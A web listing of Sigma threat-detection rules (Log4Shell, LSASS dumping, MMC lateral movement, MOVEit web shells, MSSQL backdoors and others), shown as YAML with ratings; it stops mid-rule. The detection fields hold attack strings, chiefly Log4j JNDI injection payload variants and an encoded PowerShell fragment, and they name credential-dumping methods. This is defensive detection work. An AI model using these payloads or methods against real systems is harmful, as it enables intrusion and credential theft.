Live Memory Dump Using Powershell
Detects usage of a PowerShell command to dump the live memory of a Windows machine
view Sigma YAML
title: Live Memory Dump Using Powershell
id: cd185561-4760-45d6-a63e-a51325112cae
status: test
description: Detects usage of a PowerShell command to dump the live memory of a Windows machine
references:
- https://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps
author: Max Altgelt (Nextron Systems)
date: 2021-09-21
modified: 2022-12-25
tags:
- attack.credential-access
- attack.t1003
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'Get-StorageDiagnosticInfo'
- '-IncludeLiveDump'
condition: selection
falsepositives:
- Diagnostics
level: high
Convert to SIEM query
high
Moderate
Medium FP
LiveKD Driver Creation By Uncommon Process
Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
view Sigma YAML
title: LiveKD Driver Creation By Uncommon Process
id: 059c5af9-5131-4d8d-92b2-de4ad6146712
related:
- id: 16fe46bb-4f64-46aa-817d-ff7bec4a2352
type: similar
status: test
description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-16
tags:
- attack.privilege-escalation
- attack.stealth
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename: 'C:\Windows\System32\drivers\LiveKdD.SYS'
filter_main_legit_name:
Image|endswith:
- '\livekd.exe'
- '\livek64.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter
level: high
Convert to SIEM query
high
Moderate
Medium FP
LiveKD Kernel Memory Dump File Created
Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
view Sigma YAML
title: LiveKD Kernel Memory Dump File Created
id: 814ddeca-3d31-4265-8e07-8cc54fb44903
status: test
description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-16
tags:
- attack.privilege-escalation
- attack.stealth
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename: 'C:\Windows\livekd.dmp'
condition: selection
falsepositives:
- In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.
level: high
Convert to SIEM query
high
Strong
High FP
Load Of RstrtMgr.DLL By A Suspicious Process
Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
It could also be used for anti-analysis purposes by shut downing specific processes.
view Sigma YAML
title: Load Of RstrtMgr.DLL By A Suspicious Process
id: b48492dc-c5ef-4572-8dff-32bc241c15c8
related:
- id: 3669afd2-9891-4534-a626-e5cf03810a61
type: derived
status: test
description: |
Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
It could also be used for anti-analysis purposes by shut downing specific processes.
references:
- https://www.crowdstrike.com/blog/windows-restart-manager-part-1/
- https://www.crowdstrike.com/blog/windows-restart-manager-part-2/
- https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/
- https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html
author: Luc Génaux
date: 2023-11-28
tags:
- attack.impact
- attack.defense-impairment
- attack.t1486
- attack.t1685
logsource:
category: image_load
product: windows
detection:
selection_img:
- ImageLoaded|endswith: '\RstrtMgr.dll'
- OriginalFileName: 'RstrtMgr.dll'
selection_folders_1:
Image|contains:
# Note: increase coverage by adding more suspicious paths
- ':\Perflogs\'
- ':\Users\Public\'
- '\Temporary Internet'
selection_folders_2:
- Image|contains|all:
- ':\Users\'
- '\Favorites\'
- Image|contains|all:
- ':\Users\'
- '\Favourites\'
- Image|contains|all:
- ':\Users\'
- '\Contacts\'
condition: selection_img and 1 of selection_folders_*
falsepositives:
- Processes related to software installation
level: high
Convert to SIEM query
high
Strong
Medium FP
Loading Diagcab Package From Remote Path
Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability
view Sigma YAML
title: Loading Diagcab Package From Remote Path
id: 50cb47b8-2c33-4b23-a2e9-4600657d9746
status: test
description: Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability
references:
- https://twitter.com/nas_bench/status/1539679555908141061
- https://twitter.com/j00sean/status/1537750439701225472
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-14
tags:
- attack.execution
logsource:
product: windows
service: diagnosis-scripted
detection:
selection:
EventID: 101
PackagePath|contains: '\\\\' # Example would be: \\webdav-test.herokuapp.com@ssl\DavWWWRoot\package
condition: selection
falsepositives:
- Legitimate package hosted on a known and authorized remote location
level: high
Convert to SIEM query
high
Moderate
Low FP
Loading of Kernel Module via Insmod
Detects loading of kernel modules with insmod command.
Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.
Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
view Sigma YAML
title: Loading of Kernel Module via Insmod
id: 106d7cbd-80ff-4985-b682-a7043e5acb72
status: test
description: |
Detects loading of kernel modules with insmod command.
Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.
Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md
- https://linux.die.net/man/8/insmod
- https://man7.org/linux/man-pages/man8/kmod.8.html
author: 'Pawel Mazur'
date: 2021-11-02
modified: 2022-12-25
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1547.006
logsource:
product: linux
service: auditd
detection:
selection:
type: 'SYSCALL'
comm: insmod
exe: /usr/bin/kmod
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Low FP
Local Privilege Escalation Indicator TabTip
Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
view Sigma YAML
title: Local Privilege Escalation Indicator TabTip
id: bc2e25ed-b92b-4daa-b074-b502bdd1982b
status: test
description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
references:
- https://github.com/antonioCoco/JuicyPotatoNG
author: Florian Roth (Nextron Systems)
date: 2022-10-07
modified: 2023-04-14
tags:
- attack.collection
- attack.execution
- attack.credential-access
- attack.t1557.001
logsource:
product: windows
service: system
detection:
selection:
Provider_Name: 'Microsoft-Windows-DistributedCOM'
EventID: 10001
param1: 'C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe' # Binary starting/started
param2: 2147943140 # ERROR id
param3: '{054AAE20-4BEA-4347-8A35-64A533254A9D}' # DCOM Server
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Medium FP
Log4j RCE CVE-2021-44228 Generic
Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
view Sigma YAML
title: Log4j RCE CVE-2021-44228 Generic
id: 5ea8faa8-db8b-45be-89b0-151b84c82702
status: test
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
references:
- https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://news.ycombinator.com/item?id=29504755
- https://github.com/tangxiaofeng7/apache-log4j-poc
- https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
- https://github.com/YfryTchsGD/Log4jAttackSurface
- https://twitter.com/shutingrz/status/1469255861394866177?s=21
author: Florian Roth (Nextron Systems)
date: 2021-12-10
modified: 2022-02-06
tags:
- attack.initial-access
- attack.t1190
- detection.emerging-threats
logsource:
category: webserver
detection:
keywords:
- '${jndi:ldap:/'
- '${jndi:rmi:/'
- '${jndi:ldaps:/'
- '${jndi:dns:/'
- '/$%7bjndi:'
- '%24%7bjndi:'
- '$%7Bjndi:'
- '%2524%257Bjndi'
- '%2F%252524%25257Bjndi%3A'
- '${jndi:${lower:'
- '${::-j}${'
- '${jndi:nis'
- '${jndi:nds'
- '${jndi:corba'
- '${jndi:iiop'
- 'Reference Class Name: foo'
- '${${env:BARFOO:-j}'
- '${::-l}${::-d}${::-a}${::-p}'
- '${base64:JHtqbmRp'
- '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
- '${${lower:j}ndi:'
- '${${upper:j}ndi:'
- '${${::-j}${::-n}${::-d}${::-i}:'
filter:
- 'w.nessus.org/nessus'
- '/nessus}'
condition: keywords and not filter
falsepositives:
- Vulnerability scanning
level: high
Convert to SIEM query
high
Strong
Medium FP
Log4j RCE CVE-2021-44228 in Fields
Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
view Sigma YAML
title: Log4j RCE CVE-2021-44228 in Fields
id: 9be472ed-893c-4ec0-94da-312d2765f654
status: test
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
references:
- https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://news.ycombinator.com/item?id=29504755
- https://github.com/tangxiaofeng7/apache-log4j-poc
- https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
- https://github.com/YfryTchsGD/Log4jAttackSurface
- https://twitter.com/shutingrz/status/1469255861394866177?s=21
author: Florian Roth (Nextron Systems)
date: 2021-12-10
modified: 2023-01-02
tags:
- attack.initial-access
- attack.t1190
- cve.2021-44228
- detection.emerging-threats
logsource:
category: webserver
detection:
selection1:
cs-user-agent|contains:
- '${jndi:ldap:/'
- '${jndi:rmi:/'
- '${jndi:ldaps:/'
- '${jndi:dns:/'
- '/$%7bjndi:'
- '%24%7bjndi:'
- '$%7Bjndi:'
- '%2524%257Bjndi'
- '%2F%252524%25257Bjndi%3A'
- '${jndi:${lower:'
- '${::-j}${'
- '${jndi:nis'
- '${jndi:nds'
- '${jndi:corba'
- '${jndi:iiop'
- 'Reference Class Name: foo'
- '${${env:BARFOO:-j}'
- '${::-l}${::-d}${::-a}${::-p}'
- '${base64:JHtqbmRp'
- '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
- '${${lower:j}ndi:'
- '${${upper:j}ndi:'
- '${${::-j}${::-n}${::-d}${::-i}:'
# selection2:
# user-agent|contains:
# - '${jndi:ldap:/'
# - '${jndi:rmi:/'
# - '${jndi:ldaps:/'
# - '${jndi:dns:/'
# - '/$%7bjndi:'
# - '%24%7bjndi:'
# - '$%7Bjndi:'
# - '%2524%257Bjndi'
# - '%2F%252524%25257Bjndi%3A'
# - '${jndi:${lower:'
# - '${::-j}${'
# - '${jndi:nis'
# - '${jndi:nds'
# - '${jndi:corba'
# - '${jndi:iiop'
# - 'Reference Class Name: foo'
# - '${${env:BARFOO:-j}'
# - '${::-l}${::-d}${::-a}${::-p}'
# - '${base64:JHtqbmRp'
# - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
# - '${${lower:j}ndi:'
# - '${${upper:j}ndi:'
# - '${${::-j}${::-n}${::-d}${::-i}:'
selection3:
cs-uri-query|contains:
- '${jndi:ldap:/'
- '${jndi:rmi:/'
- '${jndi:ldaps:/'
- '${jndi:dns:/'
- '/$%7bjndi:'
- '%24%7bjndi:'
- '$%7Bjndi:'
- '%2524%257Bjndi'
- '%2F%252524%25257Bjndi%3A'
- '${jndi:${lower:'
- '${::-j}${'
- '${jndi:nis'
- '${jndi:nds'
- '${jndi:corba'
- '${jndi:iiop'
- 'Reference Class Name: foo'
- '${${env:BARFOO:-j}'
- '${::-l}${::-d}${::-a}${::-p}'
- '${base64:JHtqbmRp'
- '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
- '${${lower:j}ndi:'
- '${${upper:j}ndi:'
- '${${::-j}${::-n}${::-d}${::-i}:'
selection4:
cs-referer|contains:
- '${jndi:ldap:/'
- '${jndi:rmi:/'
- '${jndi:ldaps:/'
- '${jndi:dns:/'
- '/$%7bjndi:'
- '%24%7bjndi:'
- '$%7Bjndi:'
- '%2524%257Bjndi'
- '%2F%252524%25257Bjndi%3A'
- '${jndi:${lower:'
- '${::-j}${'
- '${jndi:nis'
- '${jndi:nds'
- '${jndi:corba'
- '${jndi:iiop'
- 'Reference Class Name: foo'
- '${${env:BARFOO:-j}'
- '${::-l}${::-d}${::-a}${::-p}'
- '${base64:JHtqbmRp'
- '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
- '${${lower:j}ndi:'
- '${${upper:j}ndi:'
- '${${::-j}${::-n}${::-d}${::-i}:'
condition: 1 of selection*
falsepositives:
- Vulnerability scanning
level: high
Convert to SIEM query
high
Moderate
Low FP
Logging Configuration Changes on Linux Host
Detect changes of syslog daemons configuration files
view Sigma YAML
title: Logging Configuration Changes on Linux Host
id: c830f15d-6f6e-430f-8074-6f73d6807841
status: test
description: Detect changes of syslog daemons configuration files
references:
- self experience
author: Mikhail Larin, oscd.community
date: 2019-10-25
modified: 2021-11-27
tags:
- attack.defense-impairment
- attack.t1685
logsource:
product: linux
service: auditd
detection:
selection:
type: 'PATH'
name:
- /etc/syslog.conf
- /etc/rsyslog.conf
- /etc/syslog-ng/syslog-ng.conf
condition: selection
falsepositives:
- Legitimate administrative activity
level: high
Convert to SIEM query
high
Moderate
High FP
Lolbas OneDriveStandaloneUpdater.exe Proxy Download
Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
view Sigma YAML
title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download
id: 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d
status: test
description: |
Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
references:
- https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
author: frack113
date: 2022-05-28
modified: 2023-08-17
tags:
- attack.command-and-control
- attack.t1105
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\SOFTWARE\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Strong
Medium FP
Lsass Full Dump Request Via DumpType Registry Settings
Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
view Sigma YAML
title: Lsass Full Dump Request Via DumpType Registry Settings
id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f719
status: test
description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
references:
- https://github.com/deepinstinct/Lsass-Shtinkering
- https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps
- https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
author: '@pbssubhash'
date: 2022-12-08
modified: 2023-08-17
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains:
- '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\DumpType'
- '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\lsass.exe\DumpType'
Details: 'DWORD (0x00000002)' # Full Dump
condition: selection
falsepositives:
- Legitimate application that needs to do a full dump of their process
level: high
Convert to SIEM query
high
Moderate
Medium FP
Lsass Memory Dump via Comsvcs DLL
Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
view Sigma YAML
title: Lsass Memory Dump via Comsvcs DLL
id: a49fa4d5-11db-418c-8473-1e014a8dd462
status: test
description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
references:
- https://twitter.com/shantanukhande/status/1229348874298388484
- https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-20
modified: 2023-11-29
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: process_access
product: windows
detection:
selection:
TargetImage|endswith: '\lsass.exe'
SourceImage|endswith: '\rundll32.exe'
CallTrace|contains: 'comsvcs.dll'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Lummac Stealer Activity - Execution Of More.com And Vbc.exe
Detects the execution of more.com and vbc.exe in the process tree.
This behavior was observed by a set of samples related to Lummac Stealer.
The Lummac payload is injected into the vbc.exe process.
view Sigma YAML
title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe
id: 19b3806e-46f2-4b4c-9337-e3d8653245ea
status: experimental
description: |
Detects the execution of more.com and vbc.exe in the process tree.
This behavior was observed by a set of samples related to Lummac Stealer.
The Lummac payload is injected into the vbc.exe process.
references:
- https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files
- https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef
- https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html
- https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-12-19
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
# VT Query: behaviour_processes:"C:\\Windows\\SysWOW64\\more.com" behaviour_processes:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"
selection_parent:
ParentImage|endswith: '\more.com'
selection_child:
- Image|endswith: '\vbc.exe'
- OriginalFileName: 'vbc.exe'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
MERCURY APT Activity
Detects suspicious command line patterns seen being used by MERCURY APT
view Sigma YAML
title: MERCURY APT Activity
id: a62298a3-1fe0-422f-9a68-ffbcbc5a123d
status: test
description: Detects suspicious command line patterns seen being used by MERCURY APT
references:
- https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
author: Florian Roth (Nextron Systems)
date: 2022-08-26
modified: 2023-03-10
tags:
- attack.execution
- attack.t1059.001
- attack.g0069
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- '-exec bypass -w 1 -enc'
- 'UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA' # Start-Job -ScriptBlock
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
MMC Executing Files with Reversed Extensions Using RTLO Abuse
Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
view Sigma YAML
title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
id: 9cfe4b27-1e56-48b4-b7a8-d46851c91a44
status: experimental
description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
references:
- https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf
- https://en.wikipedia.org/wiki/Right-to-left_override
- https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
- attack.execution
- attack.stealth
- attack.t1204.002
- attack.t1218.014
- attack.t1036.002
logsource:
category: process_creation
product: windows
detection:
selection_image:
- Image|endswith: '\mmc.exe'
- OriginalFileName: 'MMC.exe'
selection_commandline:
CommandLine|contains: # While looking at these files the prefix of their name will look something like csm.pdf, but in reality it is msc file
- 'cod.msc' # Reversed `.doc`
- 'fdp.msc' # Reversed `.pdf`
- 'ftr.msc' # Reversed `.rtf`
- 'lmth.msc' # Reversed `.html`
- 'slx.msc' # Reversed `.xls`
- 'tdo.msc' # Reversed `.odt`
- 'xcod.msc' # Reversed `.docx`
- 'xslx.msc' # Reversed `.xlsx`
- 'xtpp.msc' # Reversed `.pptx`
condition: all of selection_*
falsepositives:
- Legitimate administrative actions using MMC to execute misnamed `.msc` files.
- Unconventional but non-malicious usage of RLO or reversed extensions.
level: high
Convert to SIEM query
high
Moderate
High FP
MMC Spawning Windows Shell
Detects a Windows command line executable started from MMC
view Sigma YAML
title: MMC Spawning Windows Shell
id: 05a2ab7e-ce11-4b63-86db-ab32e763e11d
status: test
description: Detects a Windows command line executable started from MMC
references:
- https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
author: Karneades, Swisscom CSIRT
date: 2019-08-05
modified: 2022-07-14
tags:
- attack.lateral-movement
- attack.t1021.003
logsource:
category: process_creation
product: windows
detection:
selection1:
ParentImage|endswith: '\mmc.exe'
selection2:
- Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\sh.exe'
- '\bash.exe'
- '\reg.exe'
- '\regsvr32.exe'
- Image|contains: '\BITSADMIN'
condition: all of selection*
level: high
Convert to SIEM query
high
Moderate
High FP
MMC20 Lateral Movement
Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
view Sigma YAML
title: MMC20 Lateral Movement
id: f1f3bf22-deb2-418d-8cce-e1a45e46a5bd
status: test
description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
references:
- https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
- https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing
author: '@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)'
date: 2020-03-04
modified: 2021-11-27
tags:
- attack.execution
- attack.lateral-movement
- attack.t1021.003
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\svchost.exe'
Image|endswith: '\mmc.exe'
CommandLine|contains: '-Embedding'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
Medium FP
MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request
Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362
view Sigma YAML
title: MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request
id: 435e41f2-48eb-4c95-8a2b-ed24b50ec30b
status: test
description: Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362
references:
- https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023
- https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-03
modified: 2023-07-28
tags:
- attack.persistence
- attack.t1505.003
- cve.2023-34362
- detection.emerging-threats
logsource:
category: webserver
detection:
selection:
cs-method: 'GET'
cs-uri-stem|contains:
- '/human2.aspx'
- '/_human2.aspx'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Strong
Medium FP
MSDT Execution Via Answer File
Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
view Sigma YAML
title: MSDT Execution Via Answer File
id: 9c8c7000-3065-44a8-a555-79bcba5d9955
status: test
description: |
Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
references:
- https://lolbas-project.github.io/lolbas/Binaries/Msdt/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-13
modified: 2025-10-29
tags:
- attack.stealth
- attack.t1218
- attack.execution
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\msdt.exe'
CommandLine|contains: '\WINDOWS\diagnostics\index\PCWDiagnostic.xml'
CommandLine|contains|windash: ' -af '
filter_main_pcwrun:
ParentImage|endswith: '\pcwrun.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Possible undocumented parents of "msdt" other than "pcwrun".
level: high
Convert to SIEM query
high
Strong
High FP
MSHTA Execution with Suspicious File Extensions
Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,
such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
view Sigma YAML
title: MSHTA Execution with Suspicious File Extensions
id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3
status: test
description: |
Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,
such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
references:
- http://blog.sevagas.com/?Hacking-around-HTA-files
- https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356
- https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script
- https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997
- https://twitter.com/mattifestation/status/1326228491302563846
- https://www.virustotal.com/gui/file/c1f27d9795a2eba630db8a043580a0761798f06370fb1317067805f8a845b00c
author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2019-02-22
modified: 2025-05-12
tags:
- attack.stealth
- attack.t1140
- attack.t1218.005
- attack.execution
- attack.t1059.007
- cve.2020-1599
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\mshta.exe'
- OriginalFileName: 'mshta.exe'
selection_cli:
CommandLine|contains:
- '.7z'
- '.avi'
- '.bat'
- '.bmp'
- '.conf'
- '.csv'
- '.dll'
- '.doc'
- '.gif'
- '.gz'
- '.ini'
- '.jpe'
- '.jpg'
- '.json'
- '.lnk'
- '.log'
- '.mkv'
- '.mp3'
- '.mp4'
- '.pdf'
- '.png'
- '.ppt'
- '.rar'
- '.rtf'
- '.svg'
- '.tar'
- '.tmp'
- '.txt'
- '.xls'
- '.xml'
- '.yaml'
- '.yml'
- '.zip'
- 'vbscript'
# - '.chm' # could be prone to false positives
# - '.exe'
condition: all of selection_*
falsepositives:
- False positives depend on scripts and administrative tools used in the monitored environment
level: high
Convert to SIEM query
high
Moderate
Low FP
MSMQ Corrupted Packet Encountered
Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation
view Sigma YAML
title: MSMQ Corrupted Packet Encountered
id: ae94b10d-fee9-4767-82bb-439b309d5a27
status: test
description: Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation
references:
- https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-21
tags:
- attack.execution
- detection.emerging-threats
logsource:
product: windows
service: application
detection:
selection:
Provider_Name: 'MSMQ'
EventID: 2027
Level: 2
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Strong
Medium FP
MSSQL Add Account To Sysadmin Role
Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role
view Sigma YAML
title: MSSQL Add Account To Sysadmin Role
id: 08200f85-2678-463e-9c32-88dce2f073d1
status: test
description: Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role
references:
- https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
- attack.persistence
logsource:
product: windows
service: application
definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'
# warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
selection:
Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
EventID: 33205
Data|contains|all:
- 'object_name:sysadmin'
- 'statement:alter server role [sysadmin] add member '
condition: selection
falsepositives:
- Rare legitimate administrative activity
level: high
Convert to SIEM query
high
Strong
Medium FP
MSSQL Disable Audit Settings
Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server
view Sigma YAML
title: MSSQL Disable Audit Settings
id: 350dfb37-3706-4cdc-9e2e-5e24bc3a46df
status: test
